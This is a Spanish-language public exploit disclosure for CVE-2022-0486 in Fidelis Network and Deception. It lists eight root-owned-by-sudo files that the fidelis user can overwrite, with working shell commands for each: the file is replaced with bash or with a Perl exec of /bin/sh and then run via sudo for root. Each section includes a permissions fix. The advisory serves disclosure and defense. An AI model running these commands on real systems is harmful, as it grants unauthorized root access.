
Fidelis Network and Deception - Escalada de privilegios por permisos de archivos inseguros - Múltiple
Todos los exploits fueron aprobados para su divulgación pública por el Gobierno de los Estados Unidos. Un agradecimiento especial al personal militar y los enlaces gubernamentales encargados de aprobar la documentación para su distribución ilimitada. Por favor, consulte los siguientes números OTR:
Fecha: 20220517 2005H UTC
Autor del Exploit: Henry Reed, The Aerospace Corporation
Página del Proveedor: https://fidelissecurity.com/
Versiones Afectadas:
Probado en:
CVE: CVE-2022-0486
Descripción CVE: Los permisos de archivo inadecuados en los componentes CommandPost, Collector, Sensor y Sandbox de Fidelis Network y Deception permiten a un atacante con acceso administrativo local a la CLI modificar archivos afectados y habilitar la escalación de privilegios equivalente al usuario root. La vulnerabilidad está presente en las versiones de Fidelis Network y Deception anteriores a la 9.4.5. Hay parches y actualizaciones disponibles para solucionar esta vulnerabilidad.
Existen varios exploits bajo este CVE, ya que el CVE cubre una serie de permisos de archivo inadecuados. Todos los exploits se deben a un permiso NOPASSWD y varios permisos sudoers que requieren contraseña otorgados al usuario fidelis en binarios o scripts que el usuario fidelis posee, permitiendo por lo tanto que el usuario fidelis modifique arbitrariamente el archivo. Esto permite la escalación local de privilegios.
Archivo afectado con NOPASSWD:
Archivos afectados que requieren contraseña:
Se recomienda que los usuarios afectados de Fidelis Deception o Fidelis Network actualicen su software para corregir esta vulnerabilidad. También se recomienda a todos los usuarios, independientemente de si fueron afectados por esta vulnerabilidad, deshabilitar el acceso shell a sus productos Fidelis después de la configuración inicial.
Si por alguna razón no es posible ninguna de estas opciones, en este documento se describe una mitigación para cada archivo vulnerable. Hasta donde el autor ha podido probar, parece que los usuarios necesitarán usar una de estas vulnerabilidades para escalar privilegios antes de poder aplicar las mitigaciones descritas, por lo que se recomienda encarecidamente actualizar Fidelis y deshabilitar SSH.
Probado en:
Los permisos de propiedad mal configurados en /FSS/bin/shutdown.pl permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/bin/shutdown.pl como usuario root sin solicitar contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el script y escale privilegios.
$ chmod 700 /FSS/bin/shutdown.pl
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
$ sudo /FSS/bin/shutdown.pl
Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad. Observe la línea NOPASSWD, que indica que shutdown.pl es un candidato potencial para escalación de privilegios:

Cambiar los propietarios de usuario y grupo de /FSS/bin/shutdown.pl a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/bin/shutdown.pl mitigaría esta vulnerabilidad:

Probado en:
Los permisos de propiedad mal configurados en /FSS/setup/cert_mgmt permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/setup/cert_mgmt como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el script y escale privilegios.
$ chmod u+w /FSS/setup/cert_mgmt
$ cp /bin/bash /FSS/setup/cert_mgmt
$ sudo /FSS/setup/cert_mgmt
Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Cambiar los propietarios de usuario y grupo de /FSS/setup/cert_mgmt a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/setup/cert_mgmt mitigaría esta vulnerabilidad:

Probado en:
Los permisos de propiedad mal configurados en /FSS/bin/db_updater permiten al usuario fidelis escalar privilegios equivalentes al usuario root en Fidelis CommandPost. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/bin/db_updater como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el binario y escale privilegios.
$ chmod u+w /FSS/bin/db_updater
$ cp /bin/bash /FSS/bin/db_updater
$ sudo /FSS/bin/db_updater

Cambiar los propietarios de usuario y grupo de /FSS/bin/db_updater a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/bin/db_updater mitigaría esta vulnerabilidad:

Probado en:
Los permisos de propiedad mal configurados en /FSS/deception-manager/bin/deception-manager permiten al usuario fidelis escalar privilegios equivalentes al usuario root en Fidelis CommandPost. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/deception-manager/bin/deception-manager como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el binario y escale privilegios.
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
$ sudo /FSS/deception-manager/bin/deception-manager
Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Cambiar los propietarios de usuario y grupo de /FSS/deception-manager/bin/deception-manager a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/deception-manager/bin/deception-manager mitigaría esta vulnerabilidad:

Probado en:
Los permisos de propiedad mal configurados en /FSS/sbin/fssdbg.sh permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/sbin/fssdbg.sh como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el script y escale privilegios.
$ chmod u+w /FSS/sbin/fssdbg.sh
$ cp /bin/bash /FSS/sbin/fssdbg.sh
$ sudo /FSS/sbin/fssdbg.sh
Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Cambiar los propietarios de usuario y grupo de /FSS/sbin/fssdbg.sh a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/sbin/fssdbg.sh mitigaría esta vulnerabilidad:

Probado en:
Los permisos de propiedad mal configurados en /FSS/bin/mst permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/bin/mst como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el binario y escale privilegios.
$ chmod u+w /FSS/bin/mst
$ cp /bin/bash /FSS/bin/mst
$ sudo /FSS/bin/mst
Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Cambiar los propietarios de usuario y grupo de /FSS/bin/mst a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/bin/mst mitigaría esta vulnerabilidad. La siguiente es una captura de pantalla mostrando la mitigación de escalación de privilegios y un fragmento de la salida del comando mst cuando se ejecuta por fidelis sin sudo:

Captura de pantalla mostrando que incluso con la mitigación, el comando aún puede ejecutarse como sudo por el usuario fidelis:

Captura de pantalla mostrando que mst no puede modificarse para ejecutar otro código arbitrario cuando se usa la mitigación:

Probado en:
Los permisos de propiedad mal configurados en /FSS/bin/setup permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/bin/setup como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el binario y escale privilegios.
$ chmod u+w /FSS/bin/setup
$ cp /bin/bash /FSS/bin/setup
$ sudo /FSS/bin/setup
Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Cambiar los propietarios de usuario y grupo de /FSS/bin/setup a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/bin/setup mitigaría esta vulnerabilidad:

Probado en:
Los permisos de propiedad mal configurados en /FSS/setup/unlock_cp_user.sh permiten al usuario fidelis escalar privilegios equivalentes al usuario root en múltiples productos Fidelis. Por defecto, la configuración sudoers permite al usuario fidelis ejecutar /FSS/setup/unlock_cp_user.sh como usuario root si se proporciona una contraseña. El archivo pertenece al usuario fidelis, permitiendo que el usuario fidelis modifique arbitrariamente el script y escale privilegios.
$ chmod u+w /FSS/setup/unlock_cp_user.sh
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
$ sudo /FSS/setup/unlock_cp_user.sh
Captura de pantalla mostrando el descubrimiento y explotación de la vulnerabilidad:

Cambiar los propietarios de usuario y grupo de /FSS/setup/unlock_cp_user.sh a root:fidelis y solo permitir permisos de lectura y ejecución al propietario del grupo de /FSS/setup/unlock_cp_user.sh mitigaría esta vulnerabilidad:
